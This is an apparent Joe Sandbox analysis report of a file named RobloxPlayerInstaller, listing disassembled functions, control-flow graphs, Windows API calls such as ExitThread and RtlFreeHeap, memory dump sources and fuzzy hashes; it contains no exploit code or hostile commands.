                                                                              control_flow_graph 21 12444f4-1244501 call 125a316 24 1244541-1244544 ExitThread 21->24 25 1244503-124450b 21->25 25->24 26 124450d-1244511 25->26 27 1244513 call 125d03e 26->27 28 1244518-124451e 26->28 27->28 30 1244520-1244522 28->30 31 124452b-1244531 28->31 30->31 32 1244524-1244525 CloseHandle 30->32 31->24 33 1244533-1244535 31->33 32->31 33->24 34 1244537-124453b FreeLibraryAndExitThread 33->34 34->24
                                                                              APIs
                                                                                • Part of subcall function 0125A316: GetLastError.KERNEL32(00000000,?,0123E677,0125B9ED,?,?,0125A212,00000001,00000364,?,00000006,000000FF,?,01244464,0136C1C8,0000000C), ref: 0125A31A
                                                                                • Part of subcall function 0125A316: SetLastError.KERNEL32(00000000), ref: 0125A3BC
                                                                              • CloseHandle.KERNEL32(?,?,?,0124462B,?,?,0124449D,00000000), ref: 01244525
                                                                              • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,0124462B,?,?,0124449D,00000000), ref: 0124453B
                                                                              • ExitThread.KERNEL32 ref: 01244544
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                              • String ID:
                                                                              • API String ID: 1991824761-0
                                                                              • Opcode ID: 4e0652a2a21ee0870b17ad2a339aa83e6b939aa4e423849727a007ad08bd76b3
                                                                              • Instruction ID: e865b80c80c7c5a7b5285866e4542a6c9cc757bf5dac923fc59339391251b97c
                                                                              • Opcode Fuzzy Hash: 4e0652a2a21ee0870b17ad2a339aa83e6b939aa4e423849727a007ad08bd76b3
                                                                              • Instruction Fuzzy Hash: 9EF05E304216526BEF397B69E84CB6A3E99AF10361B884710AF25DB990DB30D94187D0
                                                                              Function 0125437B Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000002,?,01254375,0124466F,0124466F,?,00000002,5727C2D5,0124466F,00000002), ref: 0125438C
                                                                              • TerminateProcess.KERNEL32(00000000,?,01254375,0124466F,0124466F,?,00000002,5727C2D5,0124466F,00000002), ref: 01254393
                                                                              • ExitProcess.KERNEL32 ref: 012543A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 0e4df94015e41422cea89e150a23215f223a5470c6eb67fad726473943d8d7cc
                                                                              • Instruction ID: f12881664a65eaac3a6fbee485a52f6cab593ceac3815e3ecf39c6cf806c8ffc
                                                                              • Opcode Fuzzy Hash: 0e4df94015e41422cea89e150a23215f223a5470c6eb67fad726473943d8d7cc
                                                                              • Instruction Fuzzy Hash: 63D09E31051585BBCFA13FA1EC4D95D7F25EF403517A44010BE094A13AEF7199D19B80
                                                                              Function 0124443F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetLastError.KERNEL32(0136C1C8,0000000C), ref: 01244452
                                                                              • ExitThread.KERNEL32 ref: 01244459
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorExitLastThread
                                                                              • String ID:
                                                                              • API String ID: 1611280651-0
                                                                              • Opcode ID: 7ce2e3768778029bfac05c6af96590fe2ce7687789bd0d88e1adf6eb8a207997
                                                                              • Instruction ID: d1165dde9248cbbce16915f2cf3702a306295ed7c5faccdd67c3881468264836
                                                                              • Opcode Fuzzy Hash: 7ce2e3768778029bfac05c6af96590fe2ce7687789bd0d88e1adf6eb8a207997
                                                                              • Instruction Fuzzy Hash: 77F0CDB1960306AFEB16FFB0D88AA7E3B74EF41750F204649F51197251CF349901DBA1
                                                                              Function 0125A4B0 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 61 125a4b0-125a4b9 62 125a4e8-125a4e9 61->62 63 125a4bb-125a4ce RtlFreeHeap 61->63 63->62 64 125a4d0-125a4e7 GetLastError call 123e5d5 call 123e672 63->64 64->62
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4C6
                                                                              • GetLastError.KERNEL32(?,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 485612231-0
                                                                              • Opcode ID: 0e6bdb525ebf23abd0d1b42de9a032c3bf2a9d4abd363ce7ac5e2980463e6716
                                                                              • Instruction ID: 59540ceb94ca32379a0ce6f9c17c50596aeb918d1e658fdadc0796d1735375c2
                                                                              • Opcode Fuzzy Hash: 0e6bdb525ebf23abd0d1b42de9a032c3bf2a9d4abd363ce7ac5e2980463e6716
                                                                              • Instruction Fuzzy Hash: 7FE08C72141205AFDF312FA8F80DB9A3F68EB80692F014021FA0886060DE3485508BA0
                                                                              Function 0125A1C5 Relevance: 2.6, APIs: 2, Instructions: 125COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,01244464,0136C1C8,0000000C), ref: 0125A1C9
                                                                              • SetLastError.KERNEL32(00000000), ref: 0125A26B
                                                                                • Part of subcall function 0125B99B: RtlAllocateHeap.NTDLL(00000008,?,?,?,0125A212,00000001,00000364,?,00000006,000000FF,?,01244464,0136C1C8,0000000C), ref: 0125B9DC
                                                                                • Part of subcall function 0125A4B0: RtlFreeHeap.NTDLL(00000000,00000000,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4C6
                                                                                • Part of subcall function 0125A4B0: GetLastError.KERNEL32(?,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$Heap$AllocateFree
                                                                              • String ID:
                                                                              • API String ID: 2037364846-0
                                                                              • Opcode ID: 19fea56b08cd5dd62134ccf705c0f02ba238582a699abc791d315ebdfddab429
                                                                              • Instruction ID: 0d018398e206352dc9da50d564b6dedce4894e396f7780140fd3029a9239f06c
                                                                              • Opcode Fuzzy Hash: 19fea56b08cd5dd62134ccf705c0f02ba238582a699abc791d315ebdfddab429
                                                                              • Instruction Fuzzy Hash: BC31E5717372237EE7B13B68ACC7A7A2A5C9F666A5B100320FE15D70E0EEB54C5542A0
                                                                              Function 0125CACA Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 138 125caca-125caf2 139 125caf4-125caf6 138->139 140 125caf8-125cafa 138->140 141 125cb49-125cb4c 139->141 142 125cb00-125cb07 call 125c9ff 140->142 143 125cafc-125cafe 140->143 145 125cb0c-125cb10 142->145 143->141 146 125cb12-125cb20 GetProcAddress 145->146 147 125cb2f-125cb46 145->147 146->147 148 125cb22-125cb2d call 125381c 146->148 149 125cb48 147->149 148->149 149->141
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
